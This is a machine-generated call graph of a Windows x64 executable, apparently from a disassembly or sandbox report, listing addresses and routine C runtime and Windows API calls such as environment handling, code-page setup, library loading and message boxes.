11 API calls 16183->16184 16184->16186 16186->15925 16191 7ff690028804 16186->16191 16188 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16189 7ff69002850e 16188->16189 16190 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16189->16190 16190->16186 16192 7ff690028846 16191->16192 16193 7ff69002882d 16191->16193 16192->16193 16194 7ff69002dea8 memcpy_s 11 API calls 16192->16194 16195 7ff6900288d6 16192->16195 16196 7ff69002faf8 WideCharToMultiByte 16192->16196 16198 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16192->16198 16193->15925 16194->16192 16197 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16195->16197 16196->16192 16197->16193 16198->16192 16200 7ff6900284ce 16199->16200 16201 7ff69003190d 16199->16201 16205 7ff690031c3c GetEnvironmentStringsW 16200->16205 16244 7ff69002a534 16201->16244 16206 7ff6900284d3 16205->16206 16208 7ff690031c6c 16205->16208 16206->16182 16206->16183 16207 7ff69002faf8 WideCharToMultiByte 16209 7ff690031cbd 16207->16209 16208->16207 16210 7ff690031cc4 FreeEnvironmentStringsW 16209->16210 16211 7ff69002c90c _fread_nolock 12 API calls 16209->16211 16210->16206 16212 7ff690031cd7 16211->16212 16213 7ff690031ce8 16212->16213 16214 7ff690031cdf 16212->16214 16216 7ff69002faf8 WideCharToMultiByte 16213->16216 16215 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16214->16215 16217 7ff690031ce6 16215->16217 16218 7ff690031d0b 16216->16218 16217->16210 16219 7ff690031d19 16218->16219 16220 7ff690031d0f 16218->16220 16222 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16219->16222 16221 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16220->16221 16223 7ff690031d17 FreeEnvironmentStringsW 16221->16223 16222->16223 16223->16206 16226 7ff6900285b9 16225->16226 16227 7ff69002dea8 memcpy_s 11 API calls 16226->16227 16239 7ff6900285ef 16227->16239 16228 7ff6900285f7 16229 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16228->16229 16230 7ff6900284ef 16229->16230 16230->16188 16231 7ff69002866a 16232 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16231->16232 16232->16230 16233 7ff69002dea8 memcpy_s 11 API calls 16233->16239 16234 7ff690028659 16463 7ff6900287c0 16234->16463 16236 7ff6900297b4 __std_exception_copy 37 API calls 16236->16239 16238 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16238->16228 16239->16228 16239->16231 16239->16233 16239->16234 16239->16236 16240 7ff69002868f 16239->16240 16242 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16239->16242 16241 7ff690029c10 _isindst 17 API calls 16240->16241 16243 7ff6900286a2 16241->16243 16242->16239 16245 7ff69002a560 FlsSetValue 16244->16245 16246 7ff69002a545 FlsGetValue 16244->16246 16248 7ff69002a552 16245->16248 16249 7ff69002a56d 16245->16249 16247 7ff69002a55a 16246->16247 16246->16248 16247->16245 16250 7ff690029814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16248->16250 16252 7ff69002a558 16248->16252 16251 7ff69002dea8 memcpy_s 11 API calls 16249->16251 16253 7ff69002a5d5 16250->16253 16254 7ff69002a57c 16251->16254 16264 7ff6900315d4 16252->16264 16255 7ff69002a59a FlsSetValue 16254->16255 16256 7ff69002a58a FlsSetValue 16254->16256 16258 7ff69002a5b8 16255->16258 16259 7ff69002a5a6 FlsSetValue 16255->16259 16257 7ff69002a593 16256->16257 16261 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16257->16261 16260 7ff69002a204 memcpy_s 11 API calls 16258->16260 16259->16257 16262 7ff69002a5c0 16260->16262 16261->16248 16263 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16262->16263 16263->16252 16287 7ff690031844 16264->16287 16266 7ff690031609 16302 7ff6900312d4 16266->16302 16271 7ff69003163f 16272 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16271->16272 16283 7ff690031626 16272->16283 16273 7ff69003164e 16273->16273 16316 7ff69003197c 16273->16316 16276 7ff69003174a 16278 7ff6900243f4 memcpy_s 11 API calls 16276->16278 16277 7ff690031764 16279 7ff6900317a5 16277->16279 16284 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16277->16284 16280 7ff69003174f 16278->16280 16281 7ff69003180c 16279->16281 16327 7ff690031104 16279->16327 16282 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16280->16282 16286 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16281->16286 16282->16283 16283->16200 16284->16279 16286->16283 16288 7ff690031867 16287->16288 16290 7ff690031871 16288->16290 16342 7ff69002f5e8 EnterCriticalSection 16288->16342 16291 7ff6900318e3 16290->16291 16294 7ff690029814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16290->16294 16291->16266 16295 7ff6900318fb 16294->16295 16297 7ff690031952 16295->16297 16299 7ff69002a534 50 API calls 16295->16299 16297->16266 16300 7ff69003193c 16299->16300 16301 7ff6900315d4 65 API calls 16300->16301 16301->16297 16343 7ff690024178 16302->16343 16305 7ff690031306 16307 7ff69003131b 16305->16307 16308 7ff69003130b GetACP 16305->16308 16306 7ff6900312f4 GetOEMCP 16306->16307 16307->16283 16309 7ff69002c90c 16307->16309 16308->16307 16310 7ff69002c957 16309->16310 16311 7ff69002c91b memcpy_s 16309->16311 16312 7ff6900243f4 memcpy_s 11 API calls 16310->16312 16311->16310 16313 7ff69002c93e HeapAlloc 16311->16313 16315 7ff6900328a0 memcpy_s 2 API calls 16311->16315 16314 7ff69002c955 16312->16314 16313->16311 16313->16314 16314->16271 16314->16273 16315->16311 16317 7ff6900312d4 47 API calls 16316->16317 16319 7ff6900319a9 16317->16319 16318 7ff690031aff 16321 7ff69001b870 _log10_special 8 API calls 16318->16321 16319->16318 16320 7ff690031a00 memcpy_s 16319->16320 16322 7ff6900319e6 IsValidCodePage 16319->16322 16375 7ff6900313ec 16320->16375 16323 7ff690031741 16321->16323 16322->16318 16324 7ff6900319f7 16322->16324 16323->16276 16323->16277 16324->16320 16325 7ff690031a26 GetCPInfo 16324->16325 16325->16318 16325->16320 16462 7ff69002f5e8 EnterCriticalSection 16327->16462 16344 7ff69002419c 16343->16344 16350 7ff690024197 16343->16350 16345 7ff69002a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16344->16345 16344->16350 16346 7ff6900241b7 16345->16346 16351 7ff69002cc94 16346->16351 16350->16305 16350->16306 16352 7ff69002cca9 16351->16352 16353 7ff6900241da 16351->16353 16352->16353 16359 7ff690032614 16352->16359 16355 7ff69002cd00 16353->16355 16356 7ff69002cd28 16355->16356 16357 7ff69002cd15 16355->16357 16356->16350 16357->16356 16372 7ff690031960 16357->16372 16360 7ff69002a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16359->16360 16361 7ff690032623 16360->16361 16362 7ff69003266e 16361->16362 16371 7ff69002f5e8 EnterCriticalSection 16361->16371 16362->16353 16373 7ff69002a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16372->16373 16374 7ff690031969 16373->16374 16376 7ff690031429 GetCPInfo 16375->16376 16377 7ff69003151f 16375->16377 16376->16377 16383 7ff69003143c 16376->16383 16378 7ff69001b870 _log10_special 8 API calls 16377->16378 16380 7ff6900315be 16378->16380 16380->16318 16386 7ff690032150 16383->16386 16387 7ff690024178 45 API calls 16386->16387 16388 7ff690032192 16387->16388 16406 7ff69002ebb0 16388->16406 16408 7ff69002ebb9 MultiByteToWideChar 16406->16408 16464 7ff690028661 16463->16464 16465 7ff6900287c5 16463->16465 16464->16238 16466 7ff6900287ee 16465->16466 16467 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16465->16467 16468 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16466->16468 16467->16465 16468->16464 16470 7ff6900355e8 16469->16470 16471 7ff6900355d1 16469->16471 16470->16471 16474 7ff6900355f6 16470->16474 16472 7ff6900243f4 memcpy_s 11 API calls 16471->16472 16473 7ff6900355d6 16472->16473 16475 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16473->16475 16476 7ff690024178 45 API calls 16474->16476 16477 7ff6900355e1 16474->16477 16475->16477 16476->16477 16477->15967 16479 7ff690024178 45 API calls 16478->16479 16480 7ff690038281 16479->16480 16483 7ff690037ed8 16480->16483 16485 7ff690037f26 16483->16485 16484 7ff69001b870 _log10_special 8 API calls 16486 7ff690036515 16484->16486 16487 7ff690037fad 16485->16487 16489 7ff690037f98 GetCPInfo 16485->16489 16492 7ff690037fb1 16485->16492 16486->15967 16486->15971 16488 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16487->16488 16487->16492 16490 7ff690038045 16488->16490 16489->16487 16489->16492 16491 7ff69002c90c _fread_nolock 12 API calls 16490->16491 16490->16492 16493 7ff69003807c 16490->16493 16491->16493 16492->16484 16493->16492 16494 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16493->16494 16495 7ff6900380ea 16494->16495 16496 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16495->16496 16497 7ff6900381cc 16495->16497 16499 7ff690038110 16496->16499 16497->16492 16498 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16497->16498 16498->16492 16499->16497 16500 7ff69002c90c _fread_nolock 12 API calls 16499->16500 16501 7ff69003813d 16499->16501 16500->16501 16501->16497 16502 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16501->16502 16503 7ff6900381b4 16502->16503 16504 7ff6900381ba 16503->16504 16505 7ff6900381d4 16503->16505 16504->16497 16507 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16504->16507 16512 7ff69002e278 16505->16512 16507->16497 16509 7ff690038213 16509->16492 16511 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16509->16511 16510 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16510->16509 16511->16492 16513 7ff69002e020 __crtLCMapStringW 5 API calls 16512->16513 16514 7ff69002e2b6 16513->16514 16515 7ff69002e2be 16514->16515 16516 7ff69002e4e0 __crtLCMapStringW 5 API calls 16514->16516 16515->16509 16515->16510 16517 7ff69002e327 CompareStringW 16516->16517 16517->16515 16519 7ff690036f6a HeapSize 16518->16519 16520 7ff690036f51 16518->16520 16521 7ff6900243f4 memcpy_s 11 API calls 16520->16521 16522 7ff690036f56 16521->16522 16523 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 16522->16523 16524 7ff690036f61 16523->16524 16524->15977 16526 7ff690036f99 16525->16526 16527 7ff690036fa3 16525->16527 16529 7ff69002c90c _fread_nolock 12 API calls 16526->16529 16528 7ff690036fa8 16527->16528 16535 7ff690036faf memcpy_s 16527->16535 16530 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16528->16530 16533 7ff690036fa1 16529->16533 16530->16533 16531 7ff690036fb5 16534 7ff6900243f4 memcpy_s 11 API calls 16531->16534 16532 7ff690036fe2 HeapReAlloc 16532->16533 16532->16535 16533->15980 16534->16533 16535->16531 16535->16532 16536 7ff6900328a0 memcpy_s 2 API calls 16535->16536 16536->16535 16538 7ff69002e020 __crtLCMapStringW 5 API calls 16537->16538 16539 7ff69002e254 16538->16539 16539->15985 16541 7ff6900247e6 16540->16541 16542 7ff69002480a 16540->16542 16546 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16541->16546 16549 7ff6900247f5 16541->16549 16543 7ff69002480f 16542->16543 16544 7ff690024864 16542->16544 16547 7ff690024824 16543->16547 16543->16549 16550 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16543->16550 16545 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16544->16545 16557 7ff690024880 16545->16557 16546->16549 16551 7ff69002c90c _fread_nolock 12 API calls 16547->16551 16548 7ff690024887 GetLastError 16562 7ff690024368 16548->16562 16549->15988 16549->15989 16550->16547 16551->16549 16553 7ff6900248c2 16553->16549 16554 7ff69002ebb0 _fread_nolock MultiByteToWideChar 16553->16554 16558 7ff690024906 16554->16558 16556 7ff6900248b5 16561 7ff69002c90c _fread_nolock 12 API calls 16556->16561 16557->16548 16557->16553 16557->16556 16560 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16557->16560 16558->16548 16558->16549 16559 7ff6900243f4 memcpy_s 11 API calls 16559->16549 16560->16556 16561->16553 16563 7ff69002a5d8 memcpy_s 11 API calls 16562->16563 16564 7ff690024375 Concurrency::details::SchedulerProxy::DeleteThis 16563->16564 16565 7ff69002a5d8 memcpy_s 11 API calls 16564->16565 16566 7ff690024397 16565->16566 16566->16559 16794 7ff69001bf5c 16815 7ff69001c12c 16794->16815 16797 7ff69001c0a8 16938 7ff69001c44c IsProcessorFeaturePresent 16797->16938 16798 7ff69001bf78 __scrt_acquire_startup_lock 16800 7ff69001c0b2 16798->16800 16807 7ff69001bf96 __scrt_release_startup_lock 16798->16807 16801 7ff69001c44c 7 API calls 16800->16801 16803 7ff69001c0bd __FrameHandler3::FrameUnwindToEmptyState 16801->16803 16802 7ff69001bfbb 16804 7ff69001c041 16821 7ff69001c594 16804->16821 16806 7ff69001c046 16824 7ff690011000 16806->16824 16807->16802 16807->16804 16927 7ff690028e44 16807->16927 16812 7ff69001c069 16812->16803 16934 7ff69001c2b0 16812->16934 16816 7ff69001c134 16815->16816 16817 7ff69001c140 __scrt_dllmain_crt_thread_attach 16816->16817 16818 7ff69001c14d 16817->16818 16820 7ff69001bf70 16817->16820 16818->16820 16945 7ff69001cba8 16818->16945 16820->16797 16820->16798 16822 7ff6900397e0 memcpy_s 16821->16822 16823 7ff69001c5ab GetStartupInfoW 16822->16823 16823->16806 16825 7ff690011009 16824->16825 16972 7ff690024794 16825->16972 16827 7ff69001352b 16979 7ff6900133e0 16827->16979 16832 7ff69001b870 _log10_special 8 API calls 16835 7ff69001372a 16832->16835 16833 7ff690013736 17170 7ff690013f70 16833->17170 16834 7ff69001356c 16837 7ff690011bf0 49 API calls 16834->16837 16932 7ff69001c5d8 GetModuleHandleW 16835->16932 16855 7ff690013588 16837->16855 16839 7ff690013785 16841 7ff6900125f0 53 API calls 16839->16841 16926 7ff690013538 16841->16926 16843 7ff690013778 16844 7ff69001377d 16843->16844 16845 7ff69001379f 16843->16845 17189 7ff69001f36c 16844->17189 16847 7ff690011bf0 49 API calls 16845->16847 16852 7ff6900137be 16847->16852 16848 7ff69001365f __std_exception_copy 16849 7ff690013834 16848->16849 16850 7ff690017e10 14 API calls 16848->16850 16876 7ff690013805 __std_exception_copy 16849->16876 17193 7ff690013e90 16849->17193 16853 7ff6900136ae 16850->16853 16862 7ff6900118f0 115 API calls 16852->16862 17054 7ff690017f80 16853->17054 16854 7ff690013852 16857 7ff690013871 16854->16857 16858 7ff690013865 16854->16858 17041 7ff690017e10 16855->17041 16861 7ff690011bf0 49 API calls 16857->16861 17196 7ff690013fe0 16858->17196 16859 7ff6900136bd 16864 7ff69001380f 16859->16864 16866 7ff6900136cf 16859->16866 16861->16876 16863 7ff6900137df 16862->16863 16863->16855 16865 7ff6900137ef 16863->16865 17063 7ff690018400 16864->17063 16869 7ff6900125f0 53 API calls 16865->16869 17059 7ff690011bf0 16866->17059 16869->16926 16872 7ff69001389e SetDllDirectoryW 16878 7ff6900138c3 16872->16878 16875 7ff6900136fc 17159 7ff6900125f0 16875->17159 17114 7ff6900186b0 16876->17114 16879 7ff690013a50 16878->16879 17119 7ff690016560 16878->17119 16883 7ff690013a5a PostMessageW GetMessageW 16879->16883 16884 7ff690013a7d 16879->16884 16883->16884 17254 7ff690013080 16884->17254 16886 7ff6900138ea 16888 7ff690013947 16886->16888 16890 7ff690013901 16886->16890 17199 7ff6900165a0 16886->17199 16888->16879 16895 7ff69001395c 16888->16895 16902 7ff690013905 16890->16902 17220 7ff690016970 16890->17220 17139 7ff6900130e0 16895->17139 16897 7ff690016780 FreeLibrary 16899 7ff690013aa3 16897->16899 16902->16888 17236 7ff690012870 16902->17236 16926->16832 16928 7ff690028e7c 16927->16928 16929 7ff690028e5b 16927->16929 16930 7ff6900296e8 45 API calls 16928->16930 16929->16804 16931 7ff690028e81 16930->16931 16933 7ff69001c5e9 16932->16933 16933->16812 16936 7ff69001c2c1 16934->16936 16935 7ff69001c080 16935->16802 16936->16935 16937 7ff69001cba8 7 API calls 16936->16937 16937->16935 16939 7ff69001c472 _isindst memcpy_s 16938->16939 16940 7ff69001c491 RtlCaptureContext RtlLookupFunctionEntry 16939->16940 16941 7ff69001c4f6 memcpy_s 16940->16941 16942 7ff69001c4ba RtlVirtualUnwind 16940->16942 16943 7ff69001c528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16941->16943 16942->16941 16944 7ff69001c576 _isindst 16943->16944 16944->16800 16946 7ff69001cbba 16945->16946 16947 7ff69001cbb0 16945->16947 16946->16820 16951 7ff69001cf44 16947->16951 16952 7ff69001cbb5 16951->16952 16953 7ff69001cf53 16951->16953 16955 7ff69001cfb0 16952->16955 16959 7ff69001d180 16953->16959 16956 7ff69001cfdb 16955->16956 16957 7ff69001cfdf 16956->16957 16958 7ff69001cfbe DeleteCriticalSection 16956->16958 16957->16946 16958->16956 16963 7ff69001cfe8 16959->16963 16964 7ff69001d0d2 TlsFree 16963->16964 16969 7ff69001d02c __vcrt_InitializeCriticalSectionEx 16963->16969 16965 7ff69001d05a LoadLibraryExW 16966 7ff69001d0f9 16965->16966 16967 7ff69001d07b GetLastError 16965->16967 16968 7ff69001d119 GetProcAddress 16966->16968 16970 7ff69001d110 FreeLibrary 16966->16970 16967->16969 16968->16964 16969->16964 16969->16965 16969->16968 16971 7ff69001d09d LoadLibraryExW 16969->16971 16970->16968 16971->16966 16971->16969 16974 7ff69002e790 16972->16974 16973 7ff69002e7e3 16975 7ff690029b24 _invalid_parameter_noinfo 37 API calls 16973->16975 16974->16973 16976 7ff69002e836 16974->16976 16978 7ff69002e80c 16975->16978 17267 7ff69002e668 16976->17267 16978->16827 17275 7ff69001bb70 16979->17275 16982 7ff690013438 17277 7ff6900185a0 FindFirstFileExW 16982->17277 16983 7ff69001341b 17282 7ff6900129e0 16983->17282 16986 7ff69001342e 16990 7ff69001b870 _log10_special 8 API calls 16986->16990 16988 7ff69001344b 17292 7ff690018620 CreateFileW 16988->17292 16989 7ff6900134a5 17301 7ff690018760 16989->17301 16993 7ff6900134dd 16990->16993 16993->16926 17001 7ff6900118f0 16993->17001 16995 7ff6900134b3 16995->16986 16997 7ff6900126c0 49 API calls 16995->16997 16996 7ff69001345c 17295 7ff6900126c0 16996->17295 16997->16986 17000 7ff690013474 __vcrt_InitializeCriticalSectionEx 17000->16989 17002 7ff690013f70 108 API calls 17001->17002 17003 7ff690011925 17002->17003 17004 7ff690011bb6 17003->17004 17006 7ff6900176a0 83 API calls 17003->17006 17005 7ff69001b870 _log10_special 8 API calls 17004->17005 17007 7ff690011bd1 17005->17007 17008 7ff69001196b 17006->17008 17007->16833 17007->16834 17040 7ff69001199c 17008->17040 17646 7ff69001f9f4 17008->17646 17009 7ff69001f36c 74 API calls 17009->17004 17011 7ff690011985 17012 7ff690011989 17011->17012 17013 7ff6900119a1 17011->17013 17653 7ff690012760 17012->17653 17650 7ff69001f6bc 17013->17650 17017 7ff6900119d7 17020 7ff690011a06 17017->17020 17021 7ff6900119ee 17017->17021 17018 7ff6900119bf 17019 7ff690012760 53 API calls 17018->17019 17019->17040 17022 7ff690011bf0 49 API calls 17020->17022 17023 7ff690012760 53 API calls 17021->17023 17024 7ff690011a1d 17022->17024 17023->17040 17025 7ff690011bf0 49 API calls 17024->17025 17026 7ff690011a68 17025->17026 17027 7ff69001f9f4 73 API calls 17026->17027 17028 7ff690011a8c 17027->17028 17029 7ff690011ab9 17028->17029 17030 7ff690011aa1 17028->17030 17032 7ff69001f6bc _fread_nolock 53 API calls 17029->17032 17031 7ff690012760 53 API calls 17030->17031 17031->17040 17033 7ff690011ace 17032->17033 17034 7ff690011aec 17033->17034 17035 7ff690011ad4 17033->17035 17670 7ff69001f430 17034->17670 17037 7ff690012760 53 API calls 17035->17037 17037->17040 17039 7ff6900125f0 53 API calls 17039->17040 17040->17009 17042 7ff690017e1a 17041->17042 17043 7ff6900186b0 2 API calls 17042->17043 17044 7ff690017e39 GetEnvironmentVariableW 17043->17044 17045 7ff690017e56 ExpandEnvironmentStringsW 17044->17045 17046 7ff690017ea2 17044->17046 17045->17046 17048 7ff690017e78 17045->17048 17047 7ff69001b870 _log10_special 8 API calls 17046->17047 17049 7ff690017eb4 17047->17049 17050 7ff690018760 2 API calls 17048->17050 17049->16848 17051 7ff690017e8a 17050->17051 17052 7ff69001b870 _log10_special 8 API calls 17051->17052 17053 7ff690017e9a 17052->17053 17053->16848 17055 7ff6900186b0 2 API calls 17054->17055 17056 7ff690017f94 17055->17056 17876 7ff690027548 17056->17876 17058 7ff690017fa6 __std_exception_copy 17058->16859 17060 7ff690011c15 17059->17060 17061 7ff690023ca4 49 API calls 17060->17061 17062 7ff690011c38 17061->17062 17062->16875 17062->16876 17064 7ff690018415 17063->17064 17894 7ff690017b50 GetCurrentProcess OpenProcessToken 17064->17894 17067 7ff690017b50 7 API calls 17068 7ff690018441 17067->17068 17069 7ff69001845a 17068->17069 17070 7ff690018474 17068->17070 17072 7ff690012590 48 API calls 17069->17072 17071 7ff690012590 48 API calls 17070->17071 17074 7ff690018487 LocalFree LocalFree 17071->17074 17073 7ff690018472 17072->17073 17073->17074 17075 7ff6900184a3 17074->17075 17077 7ff6900184af 17074->17077 17904 7ff690012940 17075->17904 17078 7ff69001b870 _log10_special 8 API calls 17077->17078 17079 7ff690013814 17078->17079 17080 7ff690017c40 17079->17080 17081 7ff690017c58 17080->17081 17082 7ff690017cda GetTempPathW 17081->17082 17083 7ff690017c7c 17081->17083 17115 7ff6900186d2 MultiByteToWideChar 17114->17115 17117 7ff6900186f6 17114->17117 17115->17117 17118 7ff69001870c __std_exception_copy 17115->17118 17116 7ff690018713 MultiByteToWideChar 17116->17118 17117->17116 17117->17118 17118->16872 17120 7ff690016575 17119->17120 17121 7ff6900138d5 17120->17121 17122 7ff690012760 53 API calls 17120->17122 17123 7ff690016b00 17121->17123 17122->17121 17124 7ff690016b30 17123->17124 17133 7ff690016b4a __std_exception_copy 17123->17133 17124->17133 18088 7ff690011440 17124->18088 17126 7ff690016b54 17127 7ff690013fe0 49 API calls 17126->17127 17126->17133 17128 7ff690016b76 17127->17128 17129 7ff690016b7b 17128->17129 17130 7ff690013fe0 49 API calls 17128->17130 17132 7ff690012870 53 API calls 17129->17132 17131 7ff690016b9a 17130->17131 17131->17129 17134 7ff690013fe0 49 API calls 17131->17134 17132->17133 17133->16886 17135 7ff690016bb6 17134->17135 17135->17129 17136 7ff690016bbf 17135->17136 17137 7ff6900125f0 53 API calls 17136->17137 17138 7ff690016c2f __std_exception_copy memcpy_s 17136->17138 17137->17133 17138->16886 17150 7ff6900130ee memcpy_s 17139->17150 17140 7ff6900132e7 17141 7ff69001b870 _log10_special 8 API calls 17140->17141 17142 7ff69001338e 17141->17142 17142->16926 17158 7ff6900183e0 LocalFree 17142->17158 17144 7ff690011bf0 49 API calls 17144->17150 17145 7ff690013309 17147 7ff6900125f0 53 API calls 17145->17147 17147->17140 17149 7ff6900132e9 17153 7ff6900125f0 53 API calls 17149->17153 17150->17140 17150->17144 17150->17145 17150->17149 17152 7ff690012870 53 API calls 17150->17152 17156 7ff6900132f7 17150->17156 18149 7ff690013f10 17150->18149 18155 7ff690017530 17150->18155 18167 7ff6900115c0 17150->18167 18205 7ff6900168e0 17150->18205 18209 7ff690013b40 17150->18209 18253 7ff690013e00 17150->18253 17152->17150 17153->17140 17157 7ff6900125f0 53 API calls 17156->17157 17157->17140 17160 7ff69001262a 17159->17160 17161 7ff690023ca4 49 API calls 17160->17161 17162 7ff690012652 17161->17162 17163 7ff6900186b0 2 API calls 17162->17163 17164 7ff69001266a 17163->17164 17165 7ff690012677 MessageBoxW 17164->17165 17166 7ff69001268e MessageBoxA 17164->17166 17167 7ff6900126a0 17165->17167 17166->17167 17168 7ff69001b870 _log10_special 8 API calls 17167->17168 17169 7ff6900126b0 17168->17169 17169->16926 17171 7ff690013f7c 17170->17171 17172 7ff6900186b0 2 API calls 17171->17172 17173 7ff690013fa4 17172->17173 17174 7ff6900186b0 2 API calls 17173->17174 17175 7ff690013fb7 17174->17175 18373 7ff6900252a4 17175->18373 17178 7ff69001b870 _log10_special 8 API calls 17179 7ff690013746 17178->17179 17179->16839 17180 7ff6900176a0 17179->17180 17181 7ff6900176c4 17180->17181 17182 7ff69001f9f4 73 API calls 17181->17182 17187 7ff69001779b __std_exception_copy 17181->17187 17183 7ff6900176e0 17182->17183 17183->17187 18764 7ff690026bd8 17183->18764 17185 7ff69001f9f4 73 API calls 17188 7ff6900176f5 17185->17188 17186 7ff69001f6bc _fread_nolock 53 API calls 17186->17188 17187->16843 17188->17185 17188->17186 17188->17187 17190 7ff69001f39c 17189->17190 18779 7ff69001f148 17190->18779 17192 7ff69001f3b5 17192->16839 17194 7ff690011bf0 49 API calls 17193->17194 17195 7ff690013ead 17194->17195 17195->16854 17197 7ff690011bf0 49 API calls 17196->17197 17198 7ff690014010 17197->17198 17198->16876 17210 7ff6900165bc 17199->17210 17200 7ff69001b870 _log10_special 8 API calls 17202 7ff6900166f1 17200->17202 17201 7ff6900117e0 45 API calls 17201->17210 17202->16890 17203 7ff69001675d 17205 7ff6900125f0 53 API calls 17203->17205 17204 7ff690011bf0 49 API calls 17204->17210 17214 7ff6900166df 17205->17214 17206 7ff69001674a 17207 7ff6900125f0 53 API calls 17206->17207 17207->17214 17208 7ff690013f10 10 API calls 17208->17210 17209 7ff690017530 52 API calls 17209->17210 17210->17201 17210->17203 17210->17204 17210->17206 17210->17208 17210->17209 17211 7ff69001670d 17210->17211 17212 7ff690012870 53 API calls 17210->17212 17210->17214 17215 7ff690016737 17210->17215 17217 7ff6900115c0 118 API calls 17210->17217 17218 7ff690016720 17210->17218 17213 7ff6900125f0 53 API calls 17211->17213 17212->17210 17213->17214 17214->17200 17216 7ff6900125f0 53 API calls 17215->17216 17216->17214 17217->17210 17219 7ff6900125f0 53 API calls 17218->17219 17219->17214 18790 7ff6900181a0 17220->18790 17222 7ff690016989 17223 7ff6900181a0 3 API calls 17222->17223 17224 7ff69001699c 17223->17224 17225 7ff6900169cf 17224->17225 17226 7ff6900169b4 17224->17226 17227 7ff6900125f0 53 API calls 17225->17227 18794 7ff690016ea0 GetProcAddress 17226->18794 17229 7ff690013916 17227->17229 17229->16902 17230 7ff690016cd0 17229->17230 17231 7ff690016ced 17230->17231 17232 7ff6900125f0 53 API calls 17231->17232 17235 7ff690016d58 17231->17235 17233 7ff690016d40 17232->17233 17234 7ff690016780 FreeLibrary 17233->17234 17234->17235 17235->16902 17237 7ff6900128aa 17236->17237 17238 7ff690023ca4 49 API calls 17237->17238 17239 7ff6900128d2 17238->17239 17240 7ff6900186b0 2 API calls 17239->17240 17241 7ff6900128ea 17240->17241 17242 7ff6900128f7 MessageBoxW 17241->17242 17243 7ff69001290e MessageBoxA 17241->17243 17244 7ff690012920 17242->17244 17243->17244 17245 7ff69001b870 _log10_special 8 API calls 17244->17245 17246 7ff690012930 17245->17246 17247 7ff690016780 17246->17247 17248 7ff6900168d6 17247->17248 17253 7ff690016792 17247->17253 17248->16888 17249 7ff6900168aa 17251 7ff6900168c2 17249->17251 18858 7ff690018180 FreeLibrary 17249->18858 17251->16888 17253->17249 18857 7ff690018180 FreeLibrary 17253->18857 18859 7ff690015af0 17254->18859 17258 7ff6900130a1 17262 7ff6900130b9 17258->17262 18929 7ff690015800 17258->18929 17263 7ff6900133a0 17262->17263 17264 7ff6900133ae 17263->17264 17265 7ff6900133bf 17264->17265 19132 7ff690018180 FreeLibrary 17264->19132 17265->16897 17274 7ff69002477c EnterCriticalSection 17267->17274 17276 7ff6900133ec GetModuleFileNameW 17275->17276 17276->16982 17276->16983 17278 7ff6900185df FindClose 17277->17278 17279 7ff6900185f2 17277->17279 17278->17279 17280 7ff69001b870 _log10_special 8 API calls 17279->17280 17281 7ff690013442 17280->17281 17281->16988 17281->16989 17283 7ff69001bb70 17282->17283 17284 7ff6900129fc GetLastError 17283->17284 17285 7ff690012a29 17284->17285 17306 7ff690023ef8 17285->17306 17290 7ff69001b870 _log10_special 8 API calls 17291 7ff690012ae5 17290->17291 17291->16986 17293 7ff690013458 17292->17293 17294 7ff690018660 GetFinalPathNameByHandleW CloseHandle 17292->17294 17293->16996 17293->17000 17294->17293 17296 7ff6900126fa 17295->17296 17297 7ff690023ef8 48 API calls 17296->17297 17298 7ff690012722 MessageBoxW 17297->17298 17299 7ff69001b870 _log10_special 8 API calls 17298->17299 17300 7ff69001274c 17299->17300 17300->16986 17302 7ff69001878a WideCharToMultiByte 17301->17302 17303 7ff6900187b5 17301->17303 17302->17303 17305 7ff6900187cb __std_exception_copy 17302->17305 17304 7ff6900187d2 WideCharToMultiByte 17303->17304 17303->17305 17304->17305 17305->16995 17308 7ff690023f52 17306->17308 17307 7ff690023f77 17310 7ff690029b24 _invalid_parameter_noinfo 37 API calls 17307->17310 17308->17307 17309 7ff690023fb3 17308->17309 17328 7ff6900222b0 17309->17328 17312 7ff690023fa1 17310->17312 17314 7ff69001b870 _log10_special 8 API calls 17312->17314 17313 